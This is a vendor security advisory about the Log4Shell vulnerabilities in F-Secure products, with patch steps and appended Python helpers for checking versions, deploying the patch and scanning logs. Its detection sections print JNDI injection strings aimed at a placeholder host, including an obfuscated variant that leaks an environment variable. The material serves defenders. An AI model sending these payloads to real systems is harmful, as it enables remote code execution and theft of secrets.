The Log4J Vulnerabilities (CVE-2021-44228 / CVE-2021-45046) – which F-Secure products are affected, what it means, what steps should you take - F-Secure Community
<main> <article class="userContent"> <p><strong>Note: </strong>This article will be updated as more information becomes available. We recommend you check back from time to time.</p><p><strong>Update 2021-12-22: </strong>F-Secure Policy Manager 15.30 has been released, which includes a revised Java Runtime Environment that addresses these issues without the need to patch. Customers are advised to take this into use at their earliest opportunity.</p><p><strong>Update 2022-01-19:</strong> We have now published hotfixes for all supported versions of Policy Manager, which bring an updated version of Log4J. These can be found at our <a href="https://www.f-secure.com/en/business/support-and-downloads" rel="nofollow noreferrer ugc">Support and Downloads</a> pages. <strong>NOTE:</strong> if you already patched following the instructions below under "How to patch...", there is no critical need to apply this hotfix. We have issued it with an updated Log4J version because some third-party scanning tools, which relied on a simple version check, did not recognize our earlier patch as fixing the vulnerabilities.</p><h2 data-id="background"><strong>Background</strong></h2><p>During the early hours of 2021-12-10 (UTC+0), <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228" rel="nofollow noreferrer ugc">a vulnerability (CVE-2021-44228) was announced</a> in the widely used Log4J library. This library is used by many software vendors and service providers globally as a standardized way of handling log messages within software.</p><p>Like many other organizations, F-Secure immediately began to investigate which of our services and products might be affected.</p><p>Additionally, on 2021-12-14 (UTC+0), <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046" rel="nofollow noreferrer ugc">a further vulnerability (CVE-2021-45046)</a> was announced in the same library. Naturally, we are investigating this vulnerability too.
We will update this page with more information as it becomes available.</p><h2 data-id="what-is-the-impact-of-the-vulnerability"><strong>What is the impact of the vulnerability</strong></h2><p>The vulnerability allows an attacker to cause the target system to fetch and execute code from a remote location controlled by the attacker. The second stage - what the downloaded malicious code does next - is fully up to the attacker.</p><h2 data-id="what-f-secure-products-are-affected"><strong>What F-Secure products are affected</strong></h2><p>We have identified that <strong>only</strong> the following F-Secure products are affected by vulnerability CVE-2021-44228:</p><ul><li>F-Secure Policy Manager<ul><li><strong>Note</strong>: Only the Policy Manager Server component is affected. Standalone installations of Policy Manager Console are not affected.</li></ul></li><li>F-Secure Policy Manager Proxy</li><li>F-Secure Endpoint Proxy</li><li>F-Secure Elements Connector</li><li>F-Secure Messaging Security Gateway</li></ul><p>Other F-Secure products are <strong>NOT</strong> affected.</p><p>Please read on to see what steps are needed to address these issues.</p><h2 data-id="how-to-check-my-f-secure-elements-connector">How to check my F-Secure Elements Connector</h2><p><strong>Update: </strong>Elements Connector has now been updated via the channel to a fixed version, and there is no need to manually apply the patch.</p><p>To check if you have the latest version, please check the following:</p><p><strong>Linux/RPM</strong>:</p><pre class="code codeBlock" spellcheck="false" tabindex="0">Execute command: rpm -qa f-secure-elements-connector
This will return something similar to:
f-secure-elements-connector-21.49.96235-1.x86_64</pre><p><strong>Linux/DEB</strong>:</p><pre class="code codeBlock" spellcheck="false" tabindex="0">Execute command: dpkg -l f-secure-elements-connector   (use lower case L)
This will return something similar to:
ii  f-secure-elements-connector  21.49.96235</pre><p><strong>Windows</strong>:</p><p>Check the version in Windows "Apps and Features".</p><p>In all cases, if the version reported is 21.49.96235 or greater, you have the fixed version.</p><h2 data-id="how-to-patch-my-f-secure-policy-manager-policy-manager-proxy-endpoint-proxy"><strong>How to patch my F-Secure Policy Manager / Policy Manager Proxy / Endpoint Proxy</strong></h2><p>Both Windows and Linux versions of these products should be considered affected.</p><p><strong>Update: </strong>These products are <strong>not</strong> vulnerable to CVE-2021-45046, but <strong>must</strong> still be patched for CVE-2021-44228.</p><p>Instructions are common for all the above products.</p><p><strong>Note:</strong> the patch needs to be (re-)applied after a new installation or upgrade until fixed installers are available.</p><p>We have created a deployable security patch for this vulnerability. Please follow these steps to patch your installations:</p><p><strong>Note:</strong> The paths given below are suitable for an installation in the standard location. If you chose a custom path during installation, they will need to be adjusted accordingly.</p><ul><li>Download <a href="https://download.f-secure.com/corpro/pm/commons-java-log4j-nolookups.jar" rel="nofollow noreferrer ugc">the patch from the F-Secure server</a><ul><li>The SHA256 hash of the file should be checked to verify its integrity. It should be 64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0</li></ul></li><li>Stop the <strong>Policy Manager Server</strong> service<ul><li>Windows: <strong>net stop fsms</strong></li><li>Linux: the service name is <strong>fspms</strong>; the actual command to stop the service may vary with the operating system version.
Refer to the release notes.</li></ul></li><li>Copy the downloaded file to the correct location:<ul><li>For Windows the exact location depends on the product installed:<ul><li>Policy Manager, Policy Manager Proxy or F-Secure Endpoint Proxy<ul><li>C:\Program Files (x86)\F-Secure\Management Server 5\lib\</li><li><strong>Note: </strong>this is the only location where the patch is needed</li></ul></li></ul></li><li>For Linux the location is simpler, as all affected products use the same directory:<ul><li>/opt/f-secure/fspms/lib</li><li><strong>Note: </strong>this is the only location where the patch is needed</li></ul></li></ul></li><li>Start the <strong>Policy Manager Server</strong> service<ul><li>Linux: the service name is <strong>fspms</strong>; the actual command to start the service may vary with the operating system version. Refer to the release notes.</li><li>Windows: <strong>net start fsms</strong></li></ul></li></ul><p>As the service starts, the patch will be automatically taken into use.</p><p><strong>Note</strong>: This patch applies to all versions of the affected software from 13.10 onwards. Customers using earlier versions than this MUST upgrade to the latest supported version, as their version is incompatible with the patch and versions below 14 are out of support.</p><p><strong>Update:</strong> We have created an easy-to-use tool to verify whether the patches have been applied. You can find it <a href="https://download.f-secure.com/corpro/pm/f-secure_log4j_howtoverifypatch.zip" rel="nofollow noreferrer ugc">here</a>.</p><h2 data-id="how-to-patch-my-f-secure-messaging-security-gateway"><strong>How to patch my F-Secure Messaging Security Gateway</strong></h2><p>In most cases, F-Secure has automatically patched Messaging Security Gateway installations.</p><p>However, some customers may have configured their system to apply patches manually.
In this case the administrator will receive an email informing them of the patch availability, and they should immediately apply the patches.</p><p>The following patches have been released by F-Secure to address these vulnerabilities:</p><ul><li>4312 8.17 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4311 8.15 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4310 8.16 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4309 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4308 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4307 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4303 8.12 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4302 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4301 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4300 8.15 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4299 8.14 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4298 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4295 8.13 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4294 8.17 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4293 8.16 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4291 8.18 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4290 8.18 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4257 8.18 CVE-2021-40438 Apache security fix</li><li>4256 8.17 CVE-2021-40438 Apache security fix</li><li>4255 8.16 CVE-2021-40438 Apache security fix</li><li>4254 8.13 CVE-2021-40438 Apache security fix</li><li>4335 8.15.00 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4334 8.16.02 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4333 8.12.04 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4332 8.13.10 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4331 8.13.06 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4330 8.15.02 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4329 8.14.02 Log4j (log4Shell) CVE-2021-45046 
security fix</li><li>4328 8.13.14 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4327 8.13.08 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4326 8.13.20 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4325 8.13.18 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4324 8.17.04 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4323 8.16.04 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4322 8.13.22 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4321 8.18.02 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4320 8.18.00 Log4j (log4Shell) CVE-2021-45046 security fix</li><li>4313 8.13.14 Log4j (log4Shell) CVE-2021-44228 security fix</li><li>4336 8.17.02 Log4j (log4Shell) CVE-2021-45046 security fix</li></ul><h2 data-id="how-to-check-if-my-f-secure-product-has-been-attacked"><strong>How to check if my F-Secure product has been attacked</strong></h2><p>Log files may help in detecting an attack. Please be aware that these are only <strong>examples</strong>; different entries may be relevant instead. The log files are rotated after they reach 15 megabytes, and 50 such rotated logs are kept.</p><p>The relevant parts of the examples below are those related to "<strong>jndi</strong>" and "<strong>ldap</strong>".</p><p>Example from <strong>fspms-log4j-internal.log</strong> (Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\fspms-log4j-internal.log):</p><pre class="code codeBlock" spellcheck="false" tabindex="0">11.12.2021 09:43:23,525 INFO [log4jInternalLog] - [WARN] Error looking up JNDI resource [ldap://xxx.xxx.xxx.xxx:xxxx/abc].
11.12.2021 09:43:23,525 ERROR [log4jInternalLog] - log4j error javax.naming.NamingException: LDAP connection has been closed</pre><p>Example from <strong>request.log</strong> (Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\request.log):</p><pre class="code codeBlock" spellcheck="false" tabindex="0">0:0:0:0:0:0:0:1 - - [11/Dec/2021:07:49:38 +0100] "GET / HTTP/1.1" 200 1995 "-" "${jndi:ldap://xxx.xxx.xxx.xxx:xxxx/abc}" 0 "-" 3090 "-" "DONE"</pre><p>It is not possible to give a wide range of examples, as new variants of the exploit are constantly being created and they will cause log messages that differ from the examples above.</p><p>The initial exploit attempts may also have been obfuscated. Some basic obfuscations can be seen through with a well-crafted regular expression. An example collection of useful searches can be found at <a href="https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b" rel="nofollow noreferrer ugc">https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b</a>.</p><p>The second stage of the attack is fully dependent on what code is fetched from the remote location by the initial log4j exploit, so no general indicators of compromise can be singled out for it.</p><p>The attack may also leak environment variables from the targeted system. If the exploit URL contains the name of such a variable, log4j resolves the value and places it into the outgoing URL.</p><p><strong>Note: </strong>After patching, jndi will still appear in the request.log, as this particular log records all incoming requests.
This is by design, as it is important that the administrator can see all incoming requests.</p><h2 data-id="what-protection-does-f-secure-provide-against-this-vulnerability"><strong>What protection does F-Secure provide against this vulnerability</strong></h2><p>Our Endpoint Protection (EPP) is continuously updated with detections for the latest local exploit files, but given the many ways in which exploitation can happen, this only covers part of the problem.</p><p>EPP detections will address any payload seen in the post-exploitation phase as usual, and at this point in time we have the following detections in place that address some serious attack scenarios. These represent malicious payloads that we have seen "in the wild" in connection with Log4j exploits.</p><ul><li>TR/Drop.Cobacis.AL</li><li>TR/Rozena.wrdej</li><li>TR/PShell.Agent.SWR</li><li>TR/Coblat.G1</li><li>TR/AD.MeterpreterSC.rywng</li></ul><p>Many of these detections have been available in our EPP for months already, meaning that our customers are proactively protected from this kind of payload.</p><p>Other detections present may also help, as there are multiple ways to use the exploit. We will update the list of useful detections as the situation evolves.</p><p>Our Endpoint Detection and Response (EDR) capabilities are effective independently of this specific vulnerability; malicious activities, particularly those related to post-exploitation, will be detected as normal. We will keep adding new detections on the basis of what we see.</p><p>F-Secure Elements Vulnerability Management is constantly being updated to add detections, and we have <a href="https://community.f-secure.com/vulnerability-management-en/kb/articles/9227-f-secure-elements-vulnerability-management-can-it-detect-cve-2021-44228-log4j2" rel="nofollow noreferrer ugc">a separate page</a> detailing the current status.
This will be updated as new detections are available.</p><p>Please also check the recommendations in the following section.</p><h2 data-id="what-steps-should-you-take-in-general-(applies-to-all-software-regardless-of-vendor)"><strong>What steps should you take in general (applies to all software, regardless of vendor)</strong></h2><ul><li>Restrict network access, or limit it to trusted sites. If your system cannot connect to the Internet to fetch the malicious code, the attack will fail.</li><li>Check regularly with vendors to see if there is information on patches and other mitigations related to vulnerabilities.</li><li>Check your systems daily for updates, and apply any available as soon as possible.</li><li>Subscribe to reputable security bulletins.</li><li>Consider <a href="https://www.f-secure.com/en/business/solutions/elements-vulnerability-management" rel="nofollow noreferrer ugc">F-Secure Elements Vulnerability Management</a>, which can help identify vulnerable systems. We have produced a <a href="https://www.f-secure.com/en/business/resources/what-is-log4shell-vulnerability" rel="nofollow noreferrer ugc">comprehensive guide</a> which explains more.</li><li>Consider <a href="https://www.f-secure.com/en/business/solutions/elements-endpoint-protection" rel="nofollow noreferrer ugc">F-Secure Elements Endpoint Protection</a> or <a href="https://www.f-secure.com/en/business/solutions/endpoint-security/business-suite" rel="nofollow noreferrer ugc">F-Secure Business Suite</a> products, which can detect <a href="https://www.f-secure.com/en/business/solutions/vulnerability-management/software-updater" rel="nofollow noreferrer ugc">and patch vulnerable software</a> on the systems on which they are installed.</li></ul><h2 data-id="further-reading"><strong>Further Reading</strong></h2><p>Our F-Secure Consulting Incident Response team has also created <a href="https://www.f-secure.com/en/consulting/our-thinking/f-secure-incident-response-guidance-log4j-2-vulnerability" rel="nofollow noreferrer ugc">a post</a> with some additional information on the vulnerability.</p><h2 data-id="other-useful-links"><strong>Other useful links</strong></h2><p>SwitHak has created a useful page that collates various articles related to this vulnerability: <a href="https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592" rel="nofollow noreferrer ugc">https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592</a></p> </article> </main>
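<p>The Elements Connector version check from the section "How to check my F-Secure Elements Connector", written as an added example (not F-Secure's code): it parses the rpm and dpkg output shown there, or a bare version string copied from "Apps and Features", and compares it numerically against 21.49.96235 so that a lexical string comparison cannot give a wrong answer. The function names and the constructed sample lines are this example's own.</p>

```python
import re

# Fixed Elements Connector version stated on the F-Secure page.
FIXED_VERSION = (21, 49, 96235)

# Package line as printed by the commands on the page (constructed samples):
#   rpm -qa  -> f-secure-elements-connector-21.49.96235-1.x86_64
#   dpkg -l  -> ii  f-secure-elements-connector  21.49.96235  amd64  ...
PACKAGE_RE = re.compile(r"f-secure-elements-connector[-\s]+(\d+(?:\.\d+)+)")
# A bare version, as copied from Windows "Apps and Features".
BARE_RE = re.compile(r"^\s*(\d+(?:\.\d+)+)\s*$")


def parse_version(text):
    """Return the reported version as a tuple of ints, or None if absent.

    Comparing tuples of ints avoids the classic string-compare mistake,
    where "21.5.1" would sort above "21.49.96235".
    """
    match = PACKAGE_RE.search(text) or BARE_RE.match(text)
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def is_fixed(text, fixed=FIXED_VERSION):
    """True when the reported version is the fixed version or greater."""
    version = parse_version(text)
    return version is not None and version >= fixed
```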
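<p>The Policy Manager patch procedure above, condensed into an added example (not F-Secure's tool): it verifies the downloaded jar against the SHA256 hash given on this page before copying it into the standard lib directory for the platform, and refuses to deploy on a mismatch. Function names and error messages are this example's own; stopping and starting the Policy Manager Server service is left to the administrator, since the page says the Linux command varies by operating system version.</p>

```python
import hashlib
import os
import platform
import shutil

# Values from the F-Secure instructions (standard install locations).
PATCH_NAME = "commons-java-log4j-nolookups.jar"
EXPECTED_SHA256 = "64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0"
LIB_DIRS = {
    "Windows": r"C:\Program Files (x86)\F-Secure\Management Server 5\lib",
    "Linux": "/opt/f-secure/fspms/lib",
}


def sha256_of_file(path):
    """Hex SHA-256 of a file, hashed in chunks so large files are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_patch(path, expected=EXPECTED_SHA256):
    """True only if the downloaded jar matches the published hash."""
    return sha256_of_file(path).lower() == expected.lower()


def lib_dir_for(system=None):
    """Standard lib directory for this OS; adjust for a custom install path."""
    system = system or platform.system()
    if system not in LIB_DIRS:
        raise RuntimeError("no affected product location known for %s" % system)
    return LIB_DIRS[system]


def deploy_patch(downloaded_jar, lib_dir, expected=EXPECTED_SHA256):
    """Copy the jar into lib_dir, refusing to deploy on a hash mismatch.

    Stop the Policy Manager Server service before calling this and start it
    again afterwards (net stop/start fsms on Windows, the fspms service on
    Linux); the patch is taken into use when the service starts.
    """
    if not verify_patch(downloaded_jar, expected):
        raise ValueError("SHA-256 mismatch, not deploying %s" % downloaded_jar)
    target = os.path.join(lib_dir, PATCH_NAME)
    shutil.copyfile(downloaded_jar, target)
    return target
```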
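<p>For the section "How to check if my F-Secure product has been attacked", an added example (not F-Secure's code) that scans request.log and fspms-log4j-internal.log lines for the jndi/ldap indicators the page names, after collapsing the basic lookup obfuscations it mentions, and flags requests that also reference an environment variable, the leak the page describes. The obfuscation patterns and the sample log are constructed for this example: the page's two example entries (placeholders kept), one obfuscated request and one benign request. As the page's note says, a hit in request.log after patching is only a logged attempt, whereas the internal-log entry shows Log4j actually performing the lookup, so the two are reported as different kinds.</p>

```python
import re

# Lookup forms used to hide the literal "jndi" inside a log message. These
# patterns are constructed for this example, not taken from the F-Secure page:
#   ${lower:J} / ${upper:n}   case lookups wrapping a single character
#   ${::-d} / ${env:NOPE:-i}  default value of an empty or unknown lookup
CASE_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)
DEFAULT_RE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# Indicators checked after normalisation. The page names "jndi" and "ldap";
# the other JNDI schemes are a generalisation.
LOOKUP_RE = re.compile(r"jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.I)
INTERNAL_RE = re.compile(r"JNDI resource \[(\w+)://", re.I)   # fspms-log4j-internal.log
ENV_RE = re.compile(r"\$\{(?:env|sys):[^{}]*\}", re.I)        # variable read into the URL


def normalize(line, max_rounds=10):
    """Collapse nested lookup obfuscations until the line stops changing."""
    for _ in range(max_rounds):
        new = CASE_RE.sub(lambda m: m.group(1), line)
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == line:
            break
        line = new
    return line


def scan_line(line):
    """Return a finding for a suspicious line, or None for a benign one."""
    text = normalize(line)
    m = LOOKUP_RE.search(text)
    kind = "attempt_in_request"
    if not m:
        m = INTERNAL_RE.search(text)
        kind = "lookup_executed_by_log4j"
    if not m:
        return None
    return {"kind": kind, "scheme": m.group(1).lower(),
            "env_lookup": bool(ENV_RE.search(text)), "normalized": text}


def scan_log(text):
    """Scan a whole log; returns (line number, finding) for every hit."""
    findings = ((n, scan_line(l)) for n, l in enumerate(text.splitlines(), 1))
    return [(n, f) for n, f in findings if f]


# Constructed sample: the page's two example entries (placeholders kept), one
# obfuscated request that also reads an environment variable, one benign request.
SAMPLE_LOG = """\
0:0:0:0:0:0:0:1 - - [11/Dec/2021:07:49:38 +0100] "GET / HTTP/1.1" 200 1995 "-" "${jndi:ldap://xxx.xxx.xxx.xxx:xxxx/abc}" 0 "-" 3090 "-" "DONE"
11.12.2021 09:43:23,525 INFO [log4jInternalLog] - [WARN] Error looking up JNDI resource [ldap://xxx.xxx.xxx.xxx:xxxx/abc].
10.0.0.5 - - [11/Dec/2021:08:01:02 +0100] "GET / HTTP/1.1" 200 1995 "-" "${${lower:j}${::-n}${env:X:-d}i:${upper:l}dap://xxx.xxx.xxx.xxx:xxxx/${env:HOSTNAME}}" 0 "-" 12 "-" "DONE"
10.0.0.6 - - [11/Dec/2021:08:02:00 +0100] "GET / HTTP/1.1" 200 1995 "-" "Mozilla/5.0" 0 "-" 4 "-" "DONE"
"""
```

Running `scan_log(SAMPLE_LOG)` reports lines 1 to 3 and leaves the benign line 4 alone; the third finding carries the normalized `${jndi:ldap://...}` string so the analyst sees the intent behind the obfuscation.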